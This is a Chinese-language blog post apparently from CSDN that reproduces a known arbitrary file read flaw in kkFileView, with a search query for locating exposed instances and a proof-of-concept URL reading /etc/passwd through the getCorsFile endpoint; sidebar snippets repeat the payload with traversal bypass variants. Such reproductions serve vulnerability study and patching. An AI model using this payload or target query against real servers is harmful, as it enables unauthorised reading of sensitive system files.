kkFileview任意文件读取漏洞复现

最新推荐文章于 2024-05-17 18:57:51 发布
最新推荐文章于 2024-05-17 18:57:51 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: 网络安全 文章标签: 渗透测试 漏洞复现 网络安全 kkFileview
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44484541/article/details/134156009
版权

一、kkFileview简介
kkFileView,一款成熟且开源的文件文档在线预览项目解决方案。kkFileView为文件文档在线预览解决方案,该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览,如doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip,rar,图片,视频,音频等等。

二、漏洞描述
Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。
Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。

三、查询语句
body=“kkFileView”

四、漏洞复现
1、访问漏洞地址
在这里插入图片描述

2、利用如下POC,成功复现获取数据
http://127.0.0.1/getCorsFile?urlPath=file:///etc/passwd
在这里插入图片描述

五、修复建议
目前厂商已经发布升级补丁以修复漏洞。

不知名hack
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kkFileView 任意文件上传致远程代码执行漏洞(QVD-2024-14703)
0xSec
04-21 1389
2024年4月,互联网上披露kkFileView远程代码执行漏洞情报,攻击者可利用该漏洞上传恶意文件,获取操作系统权限。该漏洞利用简单,建议受影响的客户尽快修漏洞
Adminer≤4.6.2任意文件读取漏洞1
08-03
Adminer≤4.6.2 任意读取漏洞0x01 前SQLite、PostgreSQL 等众多主流数据库,类似于 phpMyAdmin 的 MySQL 管理客
漏洞分析 | kkFileView远程代码执行漏洞
最新发布
WangsuSecurity的博客
05-17 824
网宿安全演武实验室监测到kkFileView存在远程代码执行漏洞(网宿评分:危急,CVSS3.1评分:9.8)
kkFileView远程代码执行漏洞分析
qq_18193739的博客
04-23 1316
使用…/…/ 即可导致任意文件内容覆盖转换pdf是启动了LibreOffile 并执行 C:\Users\26927\Downloads\kkFileView-4.2.1\server\libreoffice\program\uno.py 脚本中内容导致RCE。
kkFileview存在任意文件读取漏洞
nnn2188185的博客
04-26 7429
Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。
kkFileView任意读取漏洞思考
qq_82303224_的博客
04-26 3037
urlPath=file:///etc/passwd //突破限制目录。urlPath=file:///etc/passwd直接可以读文件和。urlPath=file:///etc/passwd 成功读取到内容,urlPath=file:///etc/passwd 提示限制目录预览。.思路7:..|/..|/..|/..|/..|/..|/..|/..|etc/passwd。file:///etc/passwd 也是 500。
Docker安装kkfileviewkkfileview在docker部署后预览出预览中的字体样式与源文件不同的解决办法,动态水印 kkfileview漏洞
chenthe1的专栏
06-21 4438
Docker容器环境环境运行 漏洞 拉取镜像docker pull keking/kkfileview 原运行方式: docker run -it -p 8012:8012 keking/kkfileview一般容器里面的 Linux是精简版的,没有 less 、cat 、vim/vi 等命令,如果需要的话可以自己安装,默认自带 APT 命令。 APT安装vim,先进入需要安装的容器(docker exec -it 容器标识 bash ),再执行如下命令:
网络安全-kkFileViews任意文件读取漏洞原理解析
weixin_39445116的博客
02-04 1600
在学习的过程中,了解到kkFileView存在任意文件读取、SSRF、文件上传漏洞。为了更深刻的理解其原理,我从git拉取了项目,由于该漏洞在最新版本已经修,所以这只是历史版本中存在的。写这篇文章来提醒自己代码中容易出问题的地方。
kkFileView漏洞总结
Websec
03-18 1959
Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。kkFileview v4.1.0存在SSRF漏洞,攻击者可以利用此漏洞造成服务器端请求伪造(SSRF),远程攻击者可以通过将任意url注入url参数来强制应用程序发出任意请求,从而获取内网机器的数据。3、kkFileview的onlinePreview接口也存在SSRF漏洞,但是利用条件上稍微有点区别,这个接口限制了后缀只能为一些常见的文本类型。
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件
nc57-任意文件读取漏洞补丁
06-08
nc57_任意文件读取漏洞补丁
SSRF漏洞
YouthBelief的博客
10-21 679
SSRF0x00 ssrf介绍0x01 成因0x02 利用1.利用协议1.1file协议读取本地文件1.2php://filter/read(file_get_contents)2.对外网、服务器所在内网、本地进行端口扫描,获取banner信息。3.攻击运行在本地或内网的应用程序。4.对内网wab应用进行指纹识别,识别企业内部资产信息。5.攻击内外网web应用,用http get 请求如(sql,strust2)0x03 漏洞探测1.1 输入url的地方1.2如果是加载图片的地方1.3其他功能点也类似0x0
gitee开源程序kkFileView踩坑及解决方案
热门推荐
剑雪封喉
12-21 1万+
目录 前言 一、依赖选择 二、环境部署安装 2.1解压 2.2启动程序 2.3踩坑--------office.home配置有误 2.4踩坑问题解决 三、踩坑-------OFFICE组件不可用 3.1确认是否是office组件的问题 3.2验证office组件是否不可用 3.3验证office组件是否可用 四、踩坑-------officeHome must exist and be a directory 五、程序优化 5.1无法打开dox文件,使用KFV程序转义成pdf时会
任意文件读取漏洞
weixin_58954236的博客
09-02 3703
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是漂代码文件,配置文件,敏感文件等等。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
服务端请求伪造
guishengyx的博客
10-10 578
SSRF成因 SSRF的成因大都是由于服务端提供了从其他服务器或应用中获取数据的功能,但没有对目标地址做出有效的过滤而造成的。 比如: A网站是所有人都可以访问的外网网站 B网站是内部访问的网站 用A网站访问B网站请求资源,而且A网站没有检测用户的访问是否合法,以A网站的身份去访问B网站,从而有攻击B网站的机会。 防护绕过 一般都是用正则匹配来对请求地址进行过滤 限制请求特定域名 禁止请求内网IP 绕过: 1、使用http://xxxx.com@www.baidu.com 2、IP转换为
shopxo download 任意文件读取漏洞
09-02
shopxo是一种流行的开源电商系统,以其简单易用和灵活性而备受欢迎。然而,它也存在一些安全漏洞,包括任意文件读取漏洞。这个漏洞可能会使攻击者能够读取服务器上的任意文件,包括敏感的配置文件和用户数据。 要利用shopxo download任意文件读取漏洞,攻击者通常会构造特定的URL请求,注入恶意代码来访问目标文件。攻击者可能可以通过执行一系列步骤来实此目标,例如: 1. 识别目标系统上潜在的敏感文件,如数据库配置文件、用户身份验证文件等。 2. 构造特定的URL来请求这些文件,使用目标系统的下载功能。 3. 在URL中注入特殊字符或路径遍历符号,以绕过访问限制和读取目标文件。 一旦攻击者成功读取到目标文件,他们可能会进一步利用这些信息来实施其他攻击,例如窃取用户信息、篡改网站内容或者进行其他恶意活动。 为了防范shopxo download任意文件读取漏洞,网站管理员可以采取以下措施: 1. 及时更新shopxo系统以修任何已知漏洞,并安装最新的补丁程序。 2. 限制对敏感文件的访问权限,确保只有授权的用户能够访问它们。 3. 验证和过滤用户输入,以防止任意文件读取漏洞的利用。 4. 实施Web应用程序防火墙(WAF),以监视和阻止恶意请求。 5. 定期进行安全审计和漏洞扫描,以及对服务器和应用程序配置进行安全性评估。 通过采取这些预防措施,可以最大限度地减少shopxo download任意文件读取漏洞的风险,并确保网站和用户数据的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值